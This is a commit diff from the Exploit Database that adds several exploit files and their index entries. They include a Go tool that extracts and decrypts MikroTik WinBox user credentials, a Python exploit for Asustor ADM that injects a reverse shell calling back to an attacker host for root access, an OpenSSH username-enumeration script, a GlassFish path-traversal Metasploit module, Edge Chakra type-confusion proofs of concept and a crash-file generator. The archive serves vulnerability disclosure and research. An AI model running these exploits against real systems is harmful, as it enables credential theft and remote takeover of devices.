DB: 2018-08-18

10 changes to exploits/shellcodes

TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
CEWE Photoshow 6.3.4 - Denial of Service (PoC)
Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl
Microsoft Edge Chakra JIT - Scope Parsing Type Confusion
Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion
Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion
Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion

OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)

Mikrotik WinBox 6.42 - Credential Disclosure (golang)

Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)

Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection

ADM 3.1.2RHG1 - Remote Code Execution
This commit is contained in:
Offensive Security 2018-08-18 05:01:47 +00:00
parent 0424dfc05b
commit 16744756bc
11 changed files with 716 additions and 2 deletions

View file

@ -0,0 +1,234 @@
/*
# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )
# Author: Maxim Yefimenko ( @slider )
# Date: 2018-08-06
# Sotware Link: https://mikrotik.com/download
# Vendor Page: https://www.mikrotik.com/
# Version: 6.29 - 6.42
# Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android ( wherever it was possible to compile.. it's golang ^_^ )
# CVE: CVE-2018-14847
# References:
# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/
# ( BasuCert ) https://github.com/BasuCert/WinboxPoC
# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp
# and special thanks to Dmitriy_Area51
*/
package main
import (
"crypto/md5"
"fmt"
"net"
"os"
"strings"
"time"
)
var (
a = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
0x00, 0x00}
b = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00}
buf = make([]byte, 1024*8)
)
func checkErr(err error) {
if err != nil {
fmt.Println("Error:" + err.Error())
}
}
func decryptPassword(user []byte, passEnc []byte) string {
var passw []byte
hasher := md5.New()
hasher.Write(user)
hasher.Write([]byte("283i4jfkai3389"))
key := hasher.Sum(nil)
for i := 0; i < len(passEnc); i++ {
passw = append(passw, passEnc[i]^key[i%len(key)])
}
return string(ASCIIonly(passw))
}
func ASCIIonly(s []byte) []byte {
for i, c := range s {
if c < 32 || c > 126 {
return s[:i]
}
}
return s
}
func extractPass(buff []byte) (s []string) {
var (
usr []byte
pwd []byte
)
//searching for StartOfRecord
for i := 0; i < len(buff); i++ {
if i+2 >= len(buff) {
break
}
if (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {
// fmt.Printf("Probably user record at offset 0x%.5x\n", i)
//some bytes ahead is enable/disable flag
i += int((buff[i+2] - 5))
if i >= len(buff) {
break
}
//searching for StartOfRecNumber
if i+3 >= len(buff) {
break
}
for !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {
i++
if i+3 >= len(buff) {
break
}
}
i += 4
if i >= len(buff) {
break
}
// fmt.Printf("SORn: 0x%X\n", i)
// comment?
i += 18
if (i + 4) >= len(buff) {
break
}
if (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {
if (i+1)+int(buff[i]) >= len(buff) {
break
}
i += int(buff[i])
} else {
i -= 18
}
//searching for StartOfPassword
if i+4 >= len(buff) {
break
}
for !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {
i++
if i+4 >= len(buff) {
break
}
}
i += 5
if (i + 3) >= len(buff) {
break
}
if (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {
pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]
i += int(buff[i-1])
}
//searching for StartOfUsername
if i+3 >= len(buff) {
break
}
for !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {
i++
if i+3 >= len(buff) {
break
}
}
i += 4
if i >= len(buff) {
break
}
if buff[i] != 0x00 {
if i+int(buff[i]) >= len(buff) {
break
}
usr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])
i += int(buff[i])
}
decrypted := decryptPassword(usr, pwd)
//fmt.Printf(" --> %s\t%s\n", buff[i], decrypted)
if len(usr) != 0 {
s = append(s, strings.Join([]string{string(usr), string(decrypted)}, ":"))
}
}
}
return s
}
func main() {
if len(os.Args) < 2 {
fmt.Printf(" [ usage: %s 192.168.88.1\n\n", os.Args[0])
os.Exit(0)
}
conn, err := net.DialTimeout("tcp", os.Args[1]+":8291", time.Duration(3*time.Second))
if err != nil {
fmt.Println(err.Error())
return
}
defer conn.Close()
conn.Write(a)
reqLen, err := conn.Read(buf)
checkErr(err)
if reqLen < 38 {
panic("First packet is too small")
}
b[19] = buf[38]
conn.Write(b)
reqLen, err = conn.Read(buf)
checkErr(err)
db := buf[:reqLen]
s := extractPass(db)
for i, acc := range s {
data := strings.SplitN(acc, ":", 2)
fmt.Printf(" [%d] %s\t%s\n", i, data[0], data[1])
}
}

View file

@ -0,0 +1,95 @@
# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
# Author: Matthew Fulton & Kyle Lovett
# Date: 2018-07-01
# Vendor Homepage: https://www.asustor.com/
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
# Version: <= ADM 3.1.2RHG1
# Tested on: ASUSTOR AS6202T
# CVE : CVE-2018-11510
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
#!/usr/bin/python
"""
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette
if exploitation occurs successfully, a root shell is granted
Authors: matthew fulton and Kyle Lovett
Date: 27 May 2018
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.
After a twitter communication Kyle was kind enough to share a few details
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
Vendor link: https://www.asustor.com
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
starting netcat listener on port 1234
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # uname -a;id
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
"""
import sys, threading, time, os, subprocess
import urllib2
import ssl
import argparse
class exploit(object):
def __init__(self,interval=1):
self.target = args.target
self.rport = args.port
self.lport = args.lport
self.remote = args.remote
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
#ignore ssl warnings
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
try:
turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
response=urllib2.urlopen(turl,context=ctx)
time.sleep(self.interval)
except urllib2.URLError as e:
print "Something is wrong:|"
print e
os._exit(1)
def revShell():
print "starting netcat listener on port "+args.lport
cmd = "nc -lv {0}".format(args.lport)
os.system(cmd)
def main():
print """exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
goexploit = exploit()
revShell()
if __name__ == '__main__':
Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
parser=argparse.ArgumentParser(description=help)
parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
parser.add_argument('--port', '-p', default="8001")
parser.add_argument('--lport', '-l', default="1234")
parser.add_argument('--remote','-r', default="192.168.1.253")
args = parser.parse_args()
main()

84
exploits/linux/remote/45210.py Executable file
View file

@ -0,0 +1,84 @@
#!/usr/bin/env python
# Copyright (c) 2018 Matthew Daley
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import argparse
import logging
import paramiko
import socket
import sys
class InvalidUsername(Exception):
pass
def add_boolean(*args, **kwargs):
pass
old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)
def userauth_failure(*args, **kwargs):
raise InvalidUsername()
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
})
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str)
arg_parser.add_argument('--port', type=int, default=22)
arg_parser.add_argument('username', type=str)
args = arg_parser.parse_args()
sock = socket.socket()
try:
sock.connect((args.hostname, args.port))
except socket.error:
print '[-] Failed to connect'
sys.exit(1)
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[-] Failed to negotiate SSH transport'
sys.exit(2)
try:
transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print '[*] Invalid username'
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print '[+] Valid username'

74
exploits/linux/webapps/45198.rb Executable file
View file

@ -0,0 +1,74 @@
# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)
# Author: Dhiraj Mishra
# Date: 2018-08-14
# Software: Oracle Glassfish Server OSE
# Version: 4.1
# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip
# CVE: 2017-1000028
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
which exits in administration console of Oracle GlassFish Server 4.1, which is
listening by default on port 4848/TCP.
},
'References' =>
[
['CVE', '2017-1000028'],
['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
['EDB', '39441']
],
'Author' =>
[
'Trustwave SpiderLabs', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => 'Aug 08 2015',
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(4848),
OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "%c0%af.." * datastore['DEPTH'] << filename
res = send_request_raw({
'method' => 'GET',
'uri' => "/theme/META-INF/prototype#{traversal}"
})
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
vprint_good("#{peer} - #{res.body}")
path = store_loot(
'oracle.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end

View file

@ -0,0 +1,31 @@
/*
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.
In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.
PoC:
*/
function opt(arr, obj) {
arr[0] = 1.1;
obj.x;
arr[0] = 2.3023e-320;
}
let arr = [1.1];
for (let i = 0; i < 0x10000; i++) {
opt(arr, {});
}
let get = Map.prototype.get;
Map.prototype.get = function (key) {
Map.prototype.get = get;
arr[0] = {};
return this.get(key);
};
opt(arr, Intl);
alert(arr[0]);

View file

@ -0,0 +1,79 @@
// PoC:
async function trigger(a = class b {
[await 1]() {
}
}) {
}
let spray = [];
for (let i = 0; i < 100000; i++) {
spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
trigger();
/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
Here's the generated bytecode.
Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
18 locals (8 temps from R10), 5 inline cache
Constant Table:
======== =====
R1 LdRoot
R2 LdC_A_I4 int:1
R3 Ld_A (undefined)
R4 LdFalse
Implicit Arg Ins:
======== === ===
R5 ArgIn_A In1
0000 InitUndecl R6
0002 TryCatch x:004c ( 71)
Line 1: a = class b {
Col 24: ^
0005 BrSrNeq_A x:0048 ( 62) R5 R3
000a NewScFunc R13 = b()
000d InitClass R13
0012 ProfiledLdFld R14 = R13.prototype #0 <0>
0016 SetHomeObj R13 R14
001b NewScObjectSimple R9
001d ProfiledStFld R9.value = R2 #1 <1>
0021 ProfiledStFld R9.done = R4 #2 <2>
0025 Yield R9 R9 <<-----------------------------------------------
0028 ResumeYield R15 R9
002b NewScFunc R16 = b.prototype[]()
002e SetComputedNameVar R16 R15
0033 ProfiledLdFld R14 = R13.prototype #0 <0>
0037 InitClassMemberComputedName R14[R15] = R16
003d SetHomeObj R16 R14
0042 InitConst R6 R13
0045 Ld_A R5 R13
0048 Leave
0049 Br x:0074 ( 40)
004c Catch R10
004e Nop
004f ProfiledLdRootFld R11 = root.Promise #4 <4>
0055 ProfiledLdMethodFld R12 = R11.reject #3 <3>
0059 StartCall ArgCount: 2
005c ArgOut_A Out0 = R11
005f ArgOut_A Out1 = R10
0062 ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3> <0>
006c Ld_A R0 R12
006f Leave
0070 Br x:0076 ( 3)
0073 Leave
0074 LdUndef R0
Line 5: }
Col 1: ^
0076 Ret
Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/

View file

@ -0,0 +1,38 @@
/*
Here's the method.
template <typename TPropertyIndex>
template <typename TPropertyIndexFrom>
void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)
{
this->Attributes = descriptor.Attributes;
this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;
this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;
this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;
this->IsAccessor = descriptor.IsAccessor;
#if ENABLE_FIXED_FIELDS
this->IsInitialized = descriptor.IsInitialized;
this->IsFixed = descriptor.IsFixed;
this->UsedAsFixed = descriptor.UsedAsFixed;
#endif
}
Given its name, I think that the method is supposed to copy all the fields from another descriptor to "this". But it actually leaves some fields uncopied. The "IsShadowed" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the "IsShadowed" field can lead to type confusion like in the PoC or uninitialized pointer dereference.
PoC:
*/
let x = 1;
this.x = 0x1234; // IsShadowed
// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.
for (let i = 0; i < 0x10000; i++) {
this['a' + i] = 1;
}
// Set IsAccessor
this.__defineSetter__('x', () => {});
// Type confusion
this.x;

View file

@ -0,0 +1,26 @@
/*
This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for issue 1531 .
PoC:
*/
function opt(arr, value) {
arr.push(value); // <--------
arr[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 0x10000; i++) {
let tmp = [1.1, 2.2, 3.3];
delete tmp[1];
opt(tmp, 2.2);
}
let arr = [1.1];
opt(arr, -5.3049894784e-314); // MAGIC VALUE!
alert(arr);
}
main();

View file

@ -0,0 +1,18 @@
/*
The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for ICU don't check whether the given object has been initialized. This allows to initialize the same object multiple times which can lead to type confusion.
It seems the recent version of Edge in Windows Insider Preview has started to use ICU. Tested on Microsoft Edge 42.17672.1000.0 and Microsoft EdgeHTML 17.17672.
The initializer for ICU has no check:
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L1151
The initializer for WinGlob has a check:
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L3046
PoC:
*/
let object = {};
Intl.NumberFormat.apply(object);
Intl.DateTimeFormat.apply(object);
Intl.DateTimeFormat.prototype.formatToParts.apply(object);

View file

@ -0,0 +1,25 @@
# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-17
# Homepage: https://cewe-photoworld.com/
# Software Link: https://cewe-photoworld.com/creator-software/windows-download
# Tested Version: 6.3.4
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Once inside of the CEWE Photoshow program click "Login". In the new window paste the content of
# "exploit.txt" into the following fields:"email address" & "Password". Click "Ok" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 4000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

View file

@ -6046,9 +6046,15 @@ id,file,description,date,author,type,platform,port
45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80
45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
45211,exploits/windows_x86-64/dos/45211.py,"CEWE Photoshow 6.3.4 - Denial of Service (PoC)",2018-08-17,"Gionathan Reale",dos,windows_x86-64,
45213,exploits/windows/dos/45213.js,"Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl",2018-08-17,"Google Security Research",dos,windows,
45214,exploits/windows/dos/45214.js,"Microsoft Edge Chakra JIT - Scope Parsing Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16693,6 +16699,7 @@ id,file,description,date,author,type,platform,port
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39764,6 +39771,7 @@ id,file,description,date,author,type,platform,port
45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
45209,exploits/hardware/webapps/45209.go,"Mikrotik WinBox 6.42 - Credential Disclosure (golang)",2018-08-17,"Maxim Yefimenko",webapps,hardware,
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux,
@ -39802,8 +39810,10 @@ id,file,description,date,author,type,platform,port
45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443

Can't render this file because it is too large.